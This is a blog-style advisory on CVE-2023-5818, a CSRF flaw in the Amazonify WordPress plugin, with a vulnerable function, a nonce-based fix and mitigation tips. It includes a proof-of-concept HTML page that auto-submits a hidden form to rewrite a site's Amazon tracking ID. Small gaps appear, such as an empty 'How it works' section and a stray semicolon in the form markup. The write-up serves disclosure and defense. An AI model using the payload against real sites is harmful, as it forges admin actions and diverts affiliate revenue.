CVE-2023-5818 - Exploiting CSRF in Amazonify WordPress Plugin to Hijack Amazon Tracking ID
On WordPress sites, plugins often handle sensitive configuration settings. When these plugins have security holes, malicious actors risk stealing sensitive data or causing major problems. One such issue is found in the Amazonify WordPress plugin, specifically tracked as CVE-2023-5818.
Let’s break down what this means, how an attacker can exploit it using a simple code example, and what you should do to stay safe.
What is CVE-2023-5818?
CVE-2023-5818 is a vulnerability in all versions of the Amazonify plugin for WordPress, up to and including version .8.1. Amazonify helps site owners add Amazon products (including affiliate links) to their site easily.
The bug? Lack of nonce checking in a core settings function. This opens the door for a Cross-Site Request Forgery (CSRF) attack, meaning an attacker can make a logged-in admin perform actions without their consent, just by tricking them into clicking a link or visiting a web page.
Official disclosure:
- Wordfence Advisory
- NVD - CVE-2023-5818
How Does CSRF Work in Amazonify?
In this case, the Amazonify plugin fails to check the security nonce (a one-time token WordPress uses to prevent fake requests). The amazonifyOptionsPage() function should check this token, but does not.
What’s the risk?
If an attacker can lure a site admin (who is logged in) to click a link or load a web page (even on another site), they can make the admin's browser send a fake request to change plugin settings—like swapping out the Amazon Tracking ID, giving the attacker affiliate commissions.
Here’s what a typical vulnerable function might look like in amazonify.php
function amazonifyOptionsPage() {
if (isset($_POST['amazonify_options'])) {
update_option('amazonify_options', $_POST['amazonify_options']);
// No check for nonce!
echo "<div>Settings saved!</div>";
}
// ... form rendering code
}
Notice, there’s no check_admin_referer() or similar nonce check. Without this, WordPress cannot confirm the request came from the legit admin’s settings page.
Exploiting the Vulnerability (Proof-of-Concept)
Suppose you’re an attacker. You want to hijack a WordPress site’s Amazon Tracking ID. You send the admin a link to your malicious site, and once they visit, your site submits a hidden form POST to the vulnerable WordPress site.
Example Exploit HTML
<html>
<body>
<form id="csrf" action="https://victim-site.com/wp-admin/options-general.php?page=amazonify"; method="POST">
<input type="hidden" name="amazonify_options[amazon_tracking_id]" value="attacker-20">
<input type="hidden" name="amazonify_options[other_setting]" value="evil">
</form>
<script>
document.getElementById('csrf').submit();
</script>
</body>
</html>
How it works:
Possibility of further abuse: If other plugin options are misused, attacker may escalate issues.
Who is vulnerable?
Any WordPress site running Amazonify up to version .8.1.
How to Fix This?
1. Update the Plugin:
If a fixed version is available, upgrade right away.
2. Check for Nonce Validation:
Developers, always add a nonce check. Here’s the correct way in WordPress
function amazonifyOptionsPage() {
if (isset($_POST['amazonify_options'])) {
if (
!isset($_POST['_wpnonce']) ||
!wp_verify_nonce($_POST['_wpnonce'], 'amazonify-options-save')
) {
wp_die('Security check failed');
}
update_option('amazonify_options', $_POST['amazonify_options']);
echo "<div>Settings saved!</div>";
}
// When rendering the form:
wp_nonce_field('amazonify-options-save');
}
3. Limit Admin Account Use:
Admins should avoid browsing unfamiliar sites while logged in.
4. Use Web Application Firewalls:
Services like Wordfence can catch some CSRF attempts.
References
- Wordfence Advisory (CVE-2023-5818)
- National Vulnerability Database - CVE-2023-5818
- Amazonify Plugin on WordPress.org
- WordPress Nonces Explained
Bottom Line:
If you’re running Amazonify, patch or disable it until this CSRF flaw is fixed. Developers: always protect admin actions with a nonce. Security is everyone’s job!
Timeline
Published on: 11/07/2023 20:15:00 UTC
Last modified on: 11/15/2023 15:38:00 UTC